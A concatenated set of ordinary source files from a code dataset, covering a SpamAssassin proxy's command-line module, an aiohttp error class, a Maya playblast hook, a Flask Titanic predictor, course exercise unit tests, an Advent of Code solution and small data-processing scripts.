sz\n    sz = sz.replace(',', '')\n    ck = re.search(\"([0-9]+)([kKmM]?)\", sz)\n    if ck is not None:\n        sz = int(ck.group(1))\n        if ck.group(2).lower() == 'k':\n            sz *= 1024\n        elif ck.group(2).lower() == 'm':\n            sz *= 1024 * 1024\n        return sz\n    return sz\n\n\n
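# Illustrative self-checks for filesize() (an added sketch, not part of the
# original module): bare digits pass through unchanged, and the k/M suffixes
# scale by powers of 1024.
assert filesize('512') == 512
assert filesize('4k') == 4 * 1024
assert filesize('2M') == 2 * 1024 * 1024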
\"\"\"\n i = i.strip().replace(' ', '')\n if i is int:\n return i\n ck = re.search(\"([0-9]+)([a-zA-Z]+)\", i)\n if ck is None:\n return int(i)\n n = int(ck.group(1))\n if ck.group(2).lower() in ['s', 'sec', 'secs']:\n return min(1, math.floor(n * 60))\n if ck.group(2).lower() in ['h', 'hr', 'hrs', 'hour', 'hours']:\n return n * 60\n if ck.group(2).lower() in ['d', 'day', 'days']:\n return n * 24 * 60\n return i\n\n\ndef check_directory(cfg_fn, directory_path):\n if not os.path.isabs(directory_path):\n return os.path.join(os.path.abspath(os.path.dirname(cfg_fn)), directory_path)\n return directory_path\n\n\ndef config_dict_from_parser(cfg_fn):\n cfg_dict = {}\n OPTS = {\n 'local': [('Listen', 'hostname', 'localhost'),\n ('Listen', 'port', 10025, 'int')],\n 'forward': [('Forward', 'hostname', 'localhost'),\n ('Forward', 'port', 10026, 'int')],\n }\n\n cfg = ConfigParser.ConfigParser()\n cfg.read(cfg_fn)\n\n def get_opt_or_default(cfg, opt):\n if not cfg.has_section(opt[0]):\n return opt[2]\n if not cfg.has_option(opt[0], opt[1]):\n return opt[2]\n v = cfg.get(opt[0], opt[1])\n if len(opt) > 3 and opt[3] == 'int':\n return int(v)\n return v\n\n # Handle special cases...\n for k in OPTS:\n val = OPTS[k]\n if type(val) is list:\n cfg_dict[k] = tuple([get_opt_or_default(cfg, x) for x in val])\n else:\n cfg_dict[k] = get_opt_or_default(cfg, val)\n if cfg_dict[k] is None:\n del(cfg_dict[k])\n\n if not cfg.has_section('General'):\n raise Exception(\"A General section is required for the configuration\")\n\n for opt in cfg.options('General'):\n v = cfg.get('General', opt)\n if v.isdigit():\n v = int(v)\n cfg_dict[opt] = v\n\n if cfg.has_section('Spamd'):\n cfg_dict['spamd'] = {}\n for opt in cfg.options('Spamd'):\n v = cfg.get('Spamd', opt)\n if v.isdigit():\n v = int(v)\n cfg_dict['spamd'][opt] = v\n\n if 'max_size' in cfg_dict:\n cfg_dict['max_size'] = filesize(cfg_dict['max_size'])\n if 'stats_report_interval' in cfg_dict:\n cfg_dict['stats_report_interval'] = interval(cfg_dict['stats_report_interval'])\n if 'store_directory' in cfg_dict:\n cfg_dict['store_directory'] = check_directory(cfg_fn, cfg_dict['store_directory'])\n cfg_dict['cfg_fn'] = cfg_fn\n return cfg_dict\n\n\ndef do_start():\n logger = get_surgat_logger()\n if len(startup_options) < 3:\n logger.error(\"Incorrect number of startup options provided???\")\n return\n cfg_data = config_dict_from_parser(startup_options[0])\n cfg_data.update({'do_filter': startup_options[1], 'collect_stats': startup_options[2]})\n\n logger.info(\"Starting surgat version {} using configuration from {}\".format(__version__, cfg_data['cfg_fn']))\n sms = SurgatMailServer(cfg_data)\n sms.start()\n try:\n asyncore.loop()\n except KeyboardInterrupt:\n pass\n\n\ndef main():\n parser = argparse.ArgumentParser(description='surgat Spamassassin Proxy server')\n parser.add_argument('--verbose', action='store_true', help='Enable verbose logging')\n parser.add_argument('--filter', action='store_true', help='Enable email filtering (for development)')\n parser.add_argument('--collect-stats', action='store_true', help='Collect data on which rules are triggered')\n parser.add_argument('--config', action='store', default='/usr/local/etc/surgat.conf',\n help='Configuration file to use')\n parser.add_argument('--version', action='store_true', help='Show version and exit')\n parser.add_argument('--daemonize', action='store_true', help='Daemonize surgat')\n parser.add_argument('--pid', default='./surgat.pid', help='PID file to use')\n args = parser.parse_args()\n\n if 
args.version:\n        print(\"surgat version {}\".format(__version__))\n        sys.exit(0)\n\n    if not os.path.exists(args.config):\n        print(\"The config file '{}' does not exist. Unable to continue.\".format(args.config))\n        sys.exit(0)\n\n    logger = get_surgat_logger('DEBUG' if args.verbose else 'INFO')\n    startup_options.extend([args.config, args.filter, args.collect_stats])\n    if args.daemonize:\n        logger.info(\"Starting as daemon\")\n        daemon = Daemonize(app='surgat', pid=args.pid, action=do_start, logger=logger)\n        daemon.start()\n        sys.exit(0)\n    do_start()\n    logger.info(\"shutting down\")\n\n\ndef replay():\n    parser = argparse.ArgumentParser(description='surgat replay message script')\n    parser.add_argument('file', action='store', nargs='*', help='Files to process')\n    args = parser.parse_args()\n\n    for fn in args.file:\n        rm = ReplayMessage(fn)\n        if not rm.is_valid or not rm.process():\n            continue\n","sub_path":"surgat/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129576443","text":"import json\nfrom typing import Any\nfrom typing import Mapping\nfrom typing import Optional\n\nfrom aiohttp.web_exceptions import HTTPError\nfrom marshmallow import Schema\nfrom marshmallow import fields\n\nfrom settings import DEBUG\n\n\nclass BaseAppException(HTTPError):\n    ...\n\n\nclass ServerError(BaseAppException):\n    status_code: int = 500\n    message: str = 'Something went wrong'\n    title: Optional[str] = None\n    description: str = ''\n\n    def __init__(self,\n                 message: Optional[str] = None,\n                 title: Optional[str] = None,\n                 payload: Optional[Mapping[str, Any]] = None,\n                 debug: Optional[str] = None,\n                 exc_code: Optional[str] = None,\n                 status_code: Optional[int] = None,\n                 ):\n        self.title = title or self.title\n        self.code = exc_code or self.__class__.__name__\n        self.status_code = status_code or self.status_code\n        self.message = message or self.message\n        self.payload = payload\n        self.debug = debug\n        super().__init__(\n            body=json.dumps(self.as_dict(), ensure_ascii=False), content_type='application/json'\n        )\n\n    def as_dict(self) -> dict:\n        \"\"\"\n        Converts the exception class data into a dictionary\n        :return:\n        \"\"\"\n        debug = dict(debug=self.debug) if DEBUG else dict()\n        error_body = dict(code=self.code, title=self.title, message=self.message, payload=self.payload, **debug)\n        validated_response_data = self.get_schema().load(error_body)\n        return validated_response_data\n\n    @classmethod\n    def get_schema(cls) -> Schema:\n        \"\"\"\n        Returns the exception schema\n        :return:\n        \"\"\"\n        class ExceptionSchema(Schema):\n            code = fields.Constant(cls.__name__, example=cls.__name__, description='Error code in PascalCase')\n            title = fields.String(\n                required=False,\n                allow_none=True,\n                example=None,\n                description='Error title to display on the client, localized.',\n            )\n            message = fields.String(\n                required=True, example=cls.message, description='Localized error message.'\n            )\n            payload = fields.Dict(\n                allow_none=True,\n                required=True,\n                example=None,\n                description='Error metadata; may contain any data '\n                            'the client needs to handle the error correctly.',\n            )\n            debug = fields.String(\n                required=False,\n                allow_none=True,\n                example=None,\n                description='(optional field) Detailed information about the error '\n                            
'that occurred in the server application. Sent to the client '\n                            'only when DEBUG mode is enabled in the server application.',\n            )\n\n        ExceptionSchema.__name__ = cls.__name__\n        return ExceptionSchema()\n\n\n__all__ = ['BaseAppException', 'ServerError']\n","sub_path":"src/exceptions/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"173822618","text":"# Copyright (c) 2013 Shotgun Software Inc.\n#\n# CONFIDENTIAL AND PROPRIETARY\n#\n# This work is provided \"AS IS\" and subject to the Shotgun Pipeline Toolkit\n# Source Code License included in this distribution package. See LICENSE.\n# By accessing, using, copying or modifying this work you indicate your\n# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights\n# not expressly granted therein are reserved by Shotgun Software Inc.\n\nimport os\nimport pprint\n\nimport maya.cmds as cmds\nimport pymel.core as pm\nimport traceback\nfrom contextlib import contextmanager\n\nimport sgtk\nfrom sgtk.platform.qt import QtGui\n\n\nHookClass = sgtk.get_hook_baseclass()\n\nPLAYBLAST_WINDOW = \"Playblast Window\"\n\n\nclass SetupWindow(HookClass):\n    \"\"\"\n    Hook called when creating playblast\n    \"\"\"\n\n    def set_hud(self):\n        visible_huds = [f for f in pm.headsUpDisplay(listHeadsUpDisplays=True)\n                        if pm.headsUpDisplay(f, query=True, visible=True)]\n        # hide all visible HUDs\n        list(map(lambda f: pm.headsUpDisplay(f, edit=True, visible=False), visible_huds))\n\n        # Add required HUD\n        # User name\n        edit_existing_hud = \"HUDUserName\" in pm.headsUpDisplay(listHeadsUpDisplays=True)\n        pm.headsUpDisplay(\"HUDUserName\", edit=edit_existing_hud,\n                          command=lambda: os.getenv(\"USERNAME\", \"unknown.user\"),\n                          event=\"playblasting\", section=1, block=1)\n        pm.headsUpDisplay(\"HUDUserName\", edit=True, visible=True, label=\"User:\")\n        # Scene name\n        edit_existing_hud = \"HUDSceneName\" in pm.headsUpDisplay(listHeadsUpDisplays=True)\n        pm.headsUpDisplay(\"HUDSceneName\", edit=edit_existing_hud,\n                          command=lambda: cmds.file(query=True, location=True, shortName=True).rsplit(\".\", 1)[0],\n                          event=\"playblasting\", section=6, block=1)\n        pm.headsUpDisplay(\"HUDSceneName\", edit=True, visible=True, label=\"Shot:\")\n        # Focal length\n        pm.headsUpDisplay(\"HUDFocalLength\", edit=True, visible=True, section=3, block=1)\n        pm.headsUpDisplay(\"HUDCurrentFrame\", edit=True, visible=True, dataFontSize=\"large\", section=8, block=1)\n\n        return visible_huds\n\n    def unset_huds(self, huds=[]):\n        # restore HUD state\n        list(map(lambda f: pm.headsUpDisplay(f, edit=True, visible=False), pm.headsUpDisplay(listHeadsUpDisplays=True)))\n        list(map(lambda f: pm.headsUpDisplay(f, edit=True, visible=True), huds))\n\n    def get_playblast_params(self, filename=\"\"):\n        app = self.parent\n        playblast_params = dict(app.playblast_parameters)\n        playblast_params[\"filename\"] = filename\n        # include audio if available\n        audio_list = pm.ls(type=\"audio\")\n        if audio_list:\n            playblast_params[\"sound\"] = audio_list[0]\n        return playblast_params\n\n    @contextmanager\n    def create_window(self):\n        # setting up context window for playblast\n\n        \"\"\" try to get data from shotgun project fields\n            need to get context's project\n            context's shotgun instance\n        \"\"\"\n        app = self.parent\n        model_editor_params = app.model_editor_parameters\n\n        video_width = cmds.getAttr(\"defaultResolution.width\")\n        video_height = cmds.getAttr(\"defaultResolution.height\")\n\n        panel_name = cmds.getPanel(withFocus=True)\n        if panel_name 
not in cmds.getPanel(type=\"modelPanel\"):\n message = \"Please select a viewport before trying to render\"\n self.logger.error(message)\n QtGui.QMessageBox.critical(None, \"No Viewport selected\", message)\n raise RuntimeError(message)\n\n camera_trans = cmds.modelEditor(panel_name, q=True, cam=True)\n camera = cmds.ls(camera_trans, dag=True, cameras=True)[0]\n model_editor_params[\"cam\"] = camera\n\n # Give Viewport 2.0 renderer only for Maya 2015++\n mayaVersionString = cmds.about(version=True)\n mayaVersion = int(mayaVersionString[:4]) if len(mayaVersionString) >= 4 else 0\n if mayaVersion >= 2015:\n model_editor_params[\"rendererName\"] = \"vp2Renderer\"\n orig_lineAAEnable = cmds.getAttr(\"hardwareRenderingGlobals.lineAAEnable\")\n cmds.setAttr(\"hardwareRenderingGlobals.lineAAEnable\", True)\n orig_multiSampleEnable = cmds.getAttr(\"hardwareRenderingGlobals.multiSampleEnable\")\n cmds.setAttr(\"hardwareRenderingGlobals.multiSampleEnable\", True)\n orig_multiSampleCount = cmds.getAttr(\"hardwareRenderingGlobals.multiSampleCount\")\n cmds.setAttr(\"hardwareRenderingGlobals.multiSampleCount\", 16)\n\n orig_holdOuts = {}\n if app.get_setting(\"use_holdout\"):\n for item in cmds.ls(type=\"mesh\", long=True):\n orig_holdOuts[item] = cmds.getAttr(\"{}.holdOut\".format(item))\n cmds.setAttr(\"{}.holdOut\".format(item), True)\n\n # Create window\n if pm.windowPref(PLAYBLAST_WINDOW, exists=True):\n pm.windowPref(PLAYBLAST_WINDOW, remove=True)\n window = pm.window(\n PLAYBLAST_WINDOW,\n titleBar=True,\n iconify=True,\n leftEdge=100,\n topEdge=100,\n width=video_width,\n height=video_height,\n sizeable=False\n )\n # Create editor area\n layout = pm.formLayout()\n editor = pm.modelEditor(**model_editor_params)\n pm.setFocus(editor)\n pm.formLayout(\n layout,\n edit=True,\n attachForm=(\n (editor, \"left\", 0),\n (editor, \"top\", 0),\n (editor, \"right\", 0),\n (editor, \"bottom\", 0)\n )\n )\n # Show window\n pm.setFocus(editor)\n pm.showWindow(window)\n pm.refresh()\n app.logger.debug(pprint.pformat(model_editor_params))\n try:\n yield editor\n except:\n traceback.print_exc()\n finally:\n pm.deleteUI(window)\n if mayaVersion >= 2015:\n cmds.setAttr(\"hardwareRenderingGlobals.lineAAEnable\", orig_lineAAEnable)\n cmds.setAttr(\"hardwareRenderingGlobals.multiSampleEnable\", orig_multiSampleEnable)\n cmds.setAttr(\"hardwareRenderingGlobals.multiSampleCount\", orig_multiSampleCount)\n for item, state in orig_holdOuts.items():\n cmds.setAttr(\"{}.holdOut\".format(item), state)\n","sub_path":"hooks/setup_window.py","file_name":"setup_window.py","file_ext":"py","file_size_in_byte":6478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"100487588","text":"# This file contains the definition of the one_line_helper function.\n\nfrom ... Graph import Graph\nfrom .... 
datum.Datum import Datum\n\ndef one_line_helper(datum, graph, graph_meta_data, hr, min, end_hr, end_min):\n    \"\"\"\n    This function processes one day of one attribute's data.\n\n    This function produces 1440 (x,y) coordinates.\n    60 data_points/hr * 24 hr/day = 1440 data_points/day\n\n    Parameters:\n        datum (Datum) : One hour of YTLA diagnostic information ~ 1 - 3 MB\n        graph (Graph) : The object to be visualized.\n        graph_meta_data (dict) : The query attribute, begin and end times.\n        hr (int) : The hour in which to begin graphing.\n        min (int) : The minute in which to begin graphing.\n        end_hr (int) : The hour in which to end graphing.\n        end_min (int) : The minute in which to end graphing.\n\n    Returns:\n        graph (Graph) : Data that will be graphed.\n    \"\"\"\n\n    moment = datum.timestamp.replace('_', ' ')\n\n    # Iterate over all hours, beginning with the first recorded hour of the day.\n    for h in range(hr, end_hr + 1):\n        # Determine whether it's the final hour.\n        if h == end_hr: # it's the last hour in range\n            end = end_min + 1\n        else:\n            end = 60\n        # Iterate over all minutes within the hour, starting at first recorded.\n        for m in range(min, end):\n            hr_str = str(h)\n            min_str = str(m)\n            padded_hr_str = hr_str.zfill(2)\n            padded_min_str = min_str.zfill(2)\n            # replace hours and minutes in moment.\n            moment = moment[0:11]\n            moment += padded_hr_str + ':' + padded_min_str\n            # Add the x coordinate of the (x,y) pair\n            graph.x_values.append(moment)\n            # Add the y coordinate of the (x,y) pair\n            graph.lone_y_values.append(\\\n                datum[graph_meta_data['attribute']][hr_str][min_str])\n\n        min = 0\n\n    return graph\n","sub_path":"client/models/graph/composers/line/one_line_helper.py","file_name":"one_line_helper.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"303937685","text":"import runSql as rs\n\n\nif __name__ == \"__main__\":\n    #16663\n    #45222\n    for i in range(16663,20000):\n        sql = \"SELECT * FROM macro_child_report_category WHERE id = '%d'\" % i\n        try:\n            result = rs.SuccessSql(sql, isSelect=True)[0]  # return the text and other content from the query, saved as a tuple\n        except:\n            print(\"notfound: report category\" + str(i))\n            continue\n\n        reportName = result['reportName']\n        reportId = result['reportId']\n        indexFreq = result['indexFreq']\n        area = result['area']\n\n        sql = \"SELECT * FROM macro_child_report_module_indicator WHERE moduleId = '%s' and area='%s' and isnull=0 \" \\\n              \"order by dataDuration asc\" % (reportId, area)\n        try:\n            indicatorData = rs.SuccessSql(sql, isSelect=True)  # return the text and other content from the query, saved as a tuple\n        except:\n            print(\"notfounddata: indicatorId = \" + str(reportId))\n            continue\n        else:\n            if (len(indicatorData) == 0):\n                continue\n            dataDuration = indicatorData[0]['dataDuration']\n            print(dataDuration)\n            timeList = dataDuration.split('-')\n            firsttime = timeList[0] + '-' + timeList[1] + '-' + timeList[2]\n            lasttime = timeList[3] + '-' + timeList[4] + '-' + timeList[5]\n            print(firsttime,lasttime)\n            print(indexFreq)\n            longyear = firsttime[:4]  # take the year of the earliest date\n\n            # time frequency: yearly\n            if (indexFreq == '1'):\n                for yearrange1 in range(int(longyear), 2021):\n                    sql = \"insert into macro_child_report_category_date (reportName,reportId,date,\" \\\n                          \"indexFreq,area) values ('%s',%s,'%s','%s','%s')\" \\\n                          % (reportName, reportId, yearrange1, indexFreq, area)\n                    print(sql)\n\n                    resFile = \"./macro_child_report_category_date_insertSql4.txt\"\n                    resultFile = open(resFile, 'a', encoding='utf-8', errors='ignore')\n                    resultFile.write(sql + ';' + \"\\n\")\n\n            # time frequency: quarterly\n            elif (indexFreq == '3'):\n                for yearrange3 in range(int(longyear) + 1, 2021):\n                    if (len(firsttime) < 10 or len(lasttime) < 10):\n                        monthList3 = ['3', '6', '9', '12']\n                    else:\n                        monthList3 = ['03', '06', '09', '12']\n                    for month3 in monthList3:\n                        data3 = str(yearrange3) + '-' + str(month3)\n                        print(data3)\n                        sql = \"insert into macro_child_report_category_date (reportName,reportId,date,\" \\\n                              \"indexFreq,area) values ('%s',%s,'%s','%s','%s')\" \\\n                              % (reportName, reportId, data3, indexFreq, area)\n                        print(sql)\n\n                        resFile = \"./macro_child_report_category_date_insertSql4.txt\"\n                        resultFile = open(resFile, 'a', encoding='utf-8', errors='ignore')\n                        resultFile.write(sql + ';' + \"\\n\")\n\n            # time frequency: monthly\n            elif (indexFreq == '4'):\n                lastyear = lasttime[:4]\n                for yearrange4 in range(int(longyear) + 1, 2021):\n                    if (len(firsttime) < 10 or len(lasttime) < 10):\n                        monthList4 = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12']\n                    else:\n                        monthList4 = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12']\n                    for month4 in monthList4:\n                        data4 = str(yearrange4) + '-' + str(month4)\n                        sql = \"insert into macro_child_report_category_date (reportName,reportId,date,\" \\\n                              \"indexFreq,area) values ('%s',%s,'%s','%s','%s')\" \\\n                              % (reportName, reportId, data4, indexFreq, area)\n                        print(sql)\n\n                        resFile = \"./macro_child_report_category_date_insertSql4.txt\"\n                        resultFile = open(resFile, 'a', encoding='utf-8', errors='ignore')\n                        resultFile.write(sql + ';' + \"\\n\")\n\n\n\n\n","sub_path":"报告指标处理部分/macro_child_report_category_date_operation.py","file_name":"macro_child_report_category_date_operation.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
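Aside (an added sketch, not part of the record above; the cursor object and helper name are hypothetical): the script interpolates values into its INSERT statements with % string formatting, while a DB-API connection can bind the same values as parameters so the driver handles quoting and escaping:

def insert_category_date(cursor, reportName, reportId, date, indexFreq, area):
    # bound parameters instead of interpolating values into the SQL text
    sql = ('insert into macro_child_report_category_date '
           '(reportName,reportId,date,indexFreq,area) values (%s,%s,%s,%s,%s)')
    cursor.execute(sql, (reportName, reportId, str(date), indexFreq, area))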
+{"seq_id":"496745261","text":"from flask import Flask, render_template, request, jsonify, redirect\nfrom data_science import make_model, test_model\nimport random\n\napp=Flask(__name__)\n\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n@app.route('/results', methods=['POST'])\ndef results():\n    global model\n    global score\n\n    (model, score) = make_model()\n    score = round(score * 100, 1)\n\n    name = request.form[\"Name\"]\n    title = request.form[\"Title\"]\n    if title.startswith(\"Mr\"):\n        title = title + \".\"\n\n    Age = int(request.form[\"Age\"])\n    Is_female = int(request.form[\"Is_female\"])\n    Pclass = int(request.form[\"Pclass\"])\n    emb_C = int(request.form[\"Embarked\"] == \"C\")\n    emb_Q = int(request.form[\"Embarked\"] == \"Q\")\n    emb_S = int(request.form[\"Embarked\"] == \"S\")\n    Family_size = int(request.form[\"Family_size\"])\n    Mr = int(request.form[\"Title\"] == \"Mr\")\n    Mrs = int(request.form[\"Title\"] == \"Mrs\")\n    Master = int(request.form[\"Title\"] == \"Master\")\n    Miss = int(request.form[\"Title\"] == \"Miss\")\n\n    prob_survived = test_model(model, Age, Is_female, Pclass, emb_C, emb_Q, emb_S, \n                               Family_size, Mr, Mrs, Master, Miss)\n    random_chance = random.random()\n    survived = random_chance < prob_survived.item()\n    prob_survived = round(prob_survived*100, 1)\n    \n    return render_template('results.html', score=score, name=name, title=title, \n                           prob_survived=prob_survived, survived=survived)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
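Aside (an added sketch, not part of the app above; the helper name is hypothetical): the three Embarked flags are a hand-rolled one-hot encoding and generalize to any category list:

def one_hot(value, categories=('C', 'Q', 'S')):
    # one 0/1 int per category, e.g. one_hot('Q') -> [0, 1, 0]
    return [int(value == c) for c in categories]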
+{"seq_id":"133562096","text":"import unittest\nfrom unittest.mock import patch\n\nfrom tmc import points, reflect\nfrom tmc.utils import load, load_module, reload_module, get_stdout, check_source\nfrom functools import reduce\nimport os\nimport os.path\nimport textwrap\nimport inspect, re\nfrom random import choice, randint, shuffle\n\nexercise = 'src.tuotantokaudet'\n\ndef source_rows(funktio: callable):\n    src = inspect.getsource(funktio)\n    lines = [line.strip() for line in re.split('\\\\n|;', src) \n        if len(line.strip()) > 0 and not line.strip().startswith(\"#\")]\n    return len(lines)\n\n@points('12.tuotantokaudet')\nclass TuotantokaudetTest(unittest.TestCase):\n    @classmethod\n    def setUpClass(cls):\n        with patch('builtins.input', side_effect=[AssertionError(\"No input prompts were expected\")]):\n            cls.module = load_module(exercise, 'fi')\n\n    def test_0a_paaohjelma_kunnossa(self):\n        ok, line = check_source(self.module)\n        message = \"\"\"Code that tests the functions must be placed inside the\nif __name__ == \"__main__\":\nblock. The following line must be moved:\n\"\"\"\n        self.assertTrue(ok, message+line)\n    \n    def test_1_funktio_olemassa(self):\n        try:\n            from src.tuotantokaudet import jarjesta_tuotantokausien_mukaan\n        except Exception as e:\n            self.fail(f'The program should contain a function named jarjesta_tuotantokausien_mukaan.')\n\n    def test_2_paluuarvon_tyyppi(self):\n        try:\n            from src.tuotantokaudet import jarjesta_tuotantokausien_mukaan\n            val = jarjesta_tuotantokausien_mukaan([{ \"nimi\": \"Dexter\", \"pisteet\" : 8.6, \"kausia\":9 }, \n                { \"nimi\": \"Friends\", \"pisteet\" : 8.9, \"kausia\":10 }])\n        except Exception as e:\n            self.fail(f\"The function raised an error when it was called like this:\\n\" + \n                'jarjesta_tuotantokausien_mukaan([{ \"nimi\": \"Dexter\", \"pisteet\" : 8.6, \"kausia\":9 }, { \"nimi\": \"Friends\", \"pisteet\" : 8.9, \"kausia\":10 }]):\\n' + \n                f'{e}')\n        taip = str(type(val)).replace(\"<class '\",\"\").replace(\"'>\",\"\")\n        self.assertTrue(type(val) == list, f\"The function jarjesta_tuotantokausien_mukaan should return a value of type list,\" + \n            f\" now it returns the value {val} which is of type {taip}\\n when it is called with the parameter\\n\" + \n            'jarjesta_tuotantokausien_mukaan([{ \"nimi\": \"Dexter\", \"pisteet\" : 8.6, \"kausia\":9 }, { \"nimi\": \"Friends\", \"pisteet\" : 8.9, \"kausia\":10 }])')\n    \n\n    def test_3_testaa_arvoilla1(self):\n        from src.tuotantokaudet import jarjesta_tuotantokausien_mukaan\n        \n        tdata = [(\"Dexter\",8.8, 9), (\"Simpsons\",8.6,30), (\"Friends\",8.9,10), (\"Oz\",8.7,6)]\n        test_case = [{\"nimi\":tc[0], \"pisteet\":tc[1], \"kausia\":tc[2]} for tc in tdata]\n        test_case_2 = test_case[:]\n        corr = sorted(test_case, key=lambda t:t[\"kausia\"])\n        val = jarjesta_tuotantokausien_mukaan(test_case)\n\n        self.assertEqual(val, corr, f'The function should return the list\\n{corr}\\n' + \n            f'when it is called with the parameter\\n{test_case}\\nnow the function returns\\n' + \n            f'{val}')\n\n        self.assertEqual(test_case, test_case_2, f\"The function must not modify the original list!\\n\" + \n            f'Before the call the list was\\n{test_case_2}\\nand after the call it is\\n{test_case}.')\n\n    def test_4_testaa_arvoilla1(self):\n        from src.tuotantokaudet import jarjesta_tuotantokausien_mukaan\n        \n        tdata = [(\"The Wire\",9.3, 5), (\"Game of Thrones\",9.2,8), (\"Band of Brothers\",9.4,1), (\"Sopranos\",9.2,6), (\"Sherlock\",9.1,4)]\n        test_case = [{\"nimi\":tc[0], \"pisteet\":tc[1], \"kausia\":tc[2]} for tc in tdata]\n        test_case_2 = test_case[:]\n        corr = sorted(test_case, key=lambda t:t[\"kausia\"])\n        val = jarjesta_tuotantokausien_mukaan(test_case)\n\n        self.assertEqual(val, corr, f'The function should return the list\\n{corr}\\n' + \n            f'when it is called with the parameter\\n{test_case}\\nnow the function returns\\n' + \n            f'{val}')\n\n        self.assertEqual(test_case, test_case_2, f\"The function must not modify the original list!\\n\" + \n            f'Before the call the list was\\n{test_case_2}\\nand after the call it is\\n{test_case}.')\n\n    \n    \nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"osa12-02_tuotantokaudet/test/test_tuotantokaudet.py","file_name":"test_tuotantokaudet.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
\n f'{val}')\n\n self.assertEqual(test_case, test_case_2, f\"Funktio ei saa muuttaa alkuperäistä listaa!\\n\" + \n f'Lista ennen kutsua oli\\n{test_case_2}\\nja kutsun jälkeen se on\\n{test_case}.')\n\n \n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"osa12-02_tuotantokaudet/test/test_tuotantokaudet.py","file_name":"test_tuotantokaudet.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"105334111","text":"def parseFilePosition(file):\r\n fileArray = open(file).read().split('\\n')\r\n parsedInput = []\r\n for i in range(len(fileArray)):\r\n tempArray = []\r\n first = fileArray[i][fileArray[i].find('position=<')+10:fileArray[i].find(', ')]\r\n second = fileArray[i][fileArray[i].find(', ')+2:fileArray[i].find('> ')]\r\n tempArray.append(int(first))\r\n tempArray.append(int(second))\r\n parsedInput.append(tempArray)\r\n return parsedInput\r\n\r\ndef parseFileVelocity(file):\r\n fileArray = open(file).read().split('\\n')\r\n parsedInput = []\r\n for i in range(len(fileArray)):\r\n tempArray = []\r\n first = fileArray[i][fileArray[i].find('velocity=<')+10:fileArray[i].rfind(', ')]\r\n second = fileArray[i][fileArray[i].rfind(', ')+2:fileArray[i].rfind('>')]\r\n tempArray.append(int(first))\r\n tempArray.append(int(second))\r\n parsedInput.append(tempArray)\r\n return parsedInput\r\n\r\ndef printPoints(minX,minY,maxX,maxY,positionArray):\r\n for i in range(minY,maxY):\r\n line = ''\r\n for j in range(minX,maxX):\r\n currentPoint = [j,i]\r\n if currentPoint in positionArray:\r\n line += '#'\r\n else:\r\n line += '.'\r\n print(line)\r\n\r\ndef changePosition(positionArray,velocityArray):\r\n for i in range(len(positionArray)):\r\n positionArray[i][0] += velocityArray[i][0]\r\n positionArray[i][1] += velocityArray[i][1]\r\n return positionArray\r\n\r\npositionArray = parseFilePosition('AoC 2018 Day 10 - input.txt')\r\nvelocityArray = parseFileVelocity('AoC 2018 Day 10 - input.txt')\r\nwaitingTime = 0\r\nwhile True:\r\n positionArray = changePosition(positionArray,velocityArray)\r\n nearOthers = 0\r\n waitingTime += 1\r\n for i in range(len(positionArray)):\r\n x = positionArray[i][0]\r\n y = positionArray[i][1]\r\n if [x,y+1] in positionArray or [x+1,y+1] in positionArray or [x+1,y] in positionArray or [x+1,y-1] in positionArray or [x,y-1] in positionArray or [x-1,y-1] in positionArray or [x-1,y] in positionArray or [x-1,y+1] in positionArray:\r\n nearOthers += 1\r\n if nearOthers == len(positionArray):\r\n break\r\nprint(waitingTime)\r\n","sub_path":"AoC 2018 Day10 - part2.py","file_name":"AoC 2018 Day10 - part2.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"270261610","text":"#!/usr/bin/env python\n#SBATCH --output=root_plot.txt\n#SBATCH -n 1\n\nfrom ROOT import TFile, TChain, TH1F, TCanvas\n\n\ndef chain_runs():\n\n chain = TChain(\"t\")\n for i in range(2045,2171):\n# for i in range(2026,2169):\n run_str = str(i)\n filepath = \"/mnt/analysis/e17028/rootfiles/run\" + run_str + \"-*.root\"\n# c = filepath.c_str()\n# std::cout << filepath << std::endl\n c = filepath\n chain.Add(c)\n\n \n correction_factor = -1.3\n c1 = TCanvas(\"c1\") \n c1.SetLogz()\n chain.Draw(\"energy_PIN1:(energy_TAC_PIN1_I2N+(energy_TAC_I2N_I2S*1.3)+1500)>>pid_corr(1000,14000,21000,1000,4000,8500)\",\"\",\"colz\")\n# pid_corr\n# c2 = TCanvas(\"c2\") \n# c2.SetLogz()\n# 
